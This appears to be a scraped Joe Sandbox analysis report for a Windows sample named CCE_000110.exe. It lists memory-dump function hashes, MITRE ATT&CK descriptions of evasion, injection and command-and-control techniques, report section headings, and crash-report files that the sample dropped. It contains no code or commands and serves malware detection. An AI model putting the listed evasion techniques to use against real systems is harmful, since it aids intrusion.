Source File: 00000000.00000002.1846512172.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_CCE_000110.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b27935f894893c4cbe14d1b0f718eb3dad6e3e876fcddc1572e21fd0ddf46248
Instruction ID: 666b1fd2cf8ed4c141550958c9c3779ec06c66c33fabb54941e3e21d88862353
Opcode Fuzzy Hash: b27935f894893c4cbe14d1b0f718eb3dad6e3e876fcddc1572e21fd0ddf46248
Instruction Fuzzy Hash: 29C08C625CE2498AC5CA92A4700CBB0B2ACF346385FD42C0C620D00053CF600060D5E1

Non-executed Functions

Function 02F61884 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

bMGQ, xrefs: 02F61895

Memory Dump Source

Source File: 00000000.00000002.1846512172.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_CCE_000110.jbxd

Similarity

API ID:
String ID: bMGQ
API String ID: 0-1803372199
Opcode ID: bc7c2cba4ecbc135a1a80fcd6af15fdef98f7dfd57569c2aba548d2aa1730cd5
Instruction ID: a5b7bce5cfb52cef473ae86456be51220f01f41cdf65d21410a4bc14881fbcc6
Opcode Fuzzy Hash: bc7c2cba4ecbc135a1a80fcd6af15fdef98f7dfd57569c2aba548d2aa1730cd5
Instruction Fuzzy Hash: D4614071E106288FDBA4CFA9C881B9DBBF1FB88304F5481A9D55CEB215DB749A85CF10

Function 02F66A87 Relevance: .7, Instructions: 703COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1846512172.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_CCE_000110.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575e5e18c89c1e76d6477594fbe18932a06250e9bd3b6e69dc47657cbf75d3ad
Instruction ID: 5d7d147774474b43d1c14073eabd63d0fdb70e1d1a30da8d8912e18e1b225800
Opcode Fuzzy Hash: 575e5e18c89c1e76d6477594fbe18932a06250e9bd3b6e69dc47657cbf75d3ad
Instruction Fuzzy Hash: B152DE8281DBDB56E7230BB89D64B86BFE58F57A68F4803C9CCE1494E7D35A4583C381

Function 02F61252 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1846512172.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_CCE_000110.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef8c4df7fc17c79358d99bb24d2c2f275c5950bc8e45271feed5da42f23f6740
Instruction ID: c112975e97ed0738be011f296d7156788ab9826ef7ee6f0b0d50c9f32233c79f
Opcode Fuzzy Hash: ef8c4df7fc17c79358d99bb24d2c2f275c5950bc8e45271feed5da42f23f6740
Instruction Fuzzy Hash: 1B513BB0E4120D8FDB48DFBAE88469ABBF2FB88340F448929D4149B365EB745849CF51

Function 02F61260 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1846512172.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_CCE_000110.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 834e39aba2c43b69a4c46a7925df6b86351fcf20a84762e4be554ae74581b0bb
Instruction ID: 57ae301971c74b67089fa6301aa00e691624bec5f822790bfeebb83572e2b521
Opcode Fuzzy Hash: 834e39aba2c43b69a4c46a7925df6b86351fcf20a84762e4be554ae74581b0bb
Instruction Fuzzy Hash: 82512CB0E4120D8FDB48DFBAE88469EBBF2FBC4340F408929D4149B365EB745849CB41

Function 02F615A0 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1846512172.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_CCE_000110.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5619457cb10aea0297240c064b15f57d62cb027ad6fcfee4fa8d168f658356e1
Instruction ID: 6007f9cffae41d4c167d233c36110605fe41ca17bd214510f8ac38dfbfa0e4e1
Opcode Fuzzy Hash: 5619457cb10aea0297240c064b15f57d62cb027ad6fcfee4fa8d168f658356e1
Instruction Fuzzy Hash: 4A4152B1E016588BEB2CCF6B8D4479AFAF7AFC5300F14C1BA854CAA215DB700986CF11

Function 02F615B0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1846512172.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_CCE_000110.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 590e8ccedda449aef948db7ce1f108999ed682f66abe23aba84d8f007d3842ca
Instruction ID: 0ed33398d538981352fb2d438cd3793a295ed89e37e8ff31505c376e8b86ae09
Opcode Fuzzy Hash: 590e8ccedda449aef948db7ce1f108999ed682f66abe23aba84d8f007d3842ca
Instruction Fuzzy Hash: 8B4131B1E016588BEB2CCF6B8D4479AFAF7BFC9340F14C1BA850DAA255DB7009858F15

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CCE_000110.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_CCE_000110.exe_f5568d793b25945132651aeaa6ebedff6b41d8af_3c18045a_2d314471-ae04-4cc4-9496-1de3b5af43cc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER67F2.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69B8.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69D9.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

Windows Analysis Report
CCE_000110.exe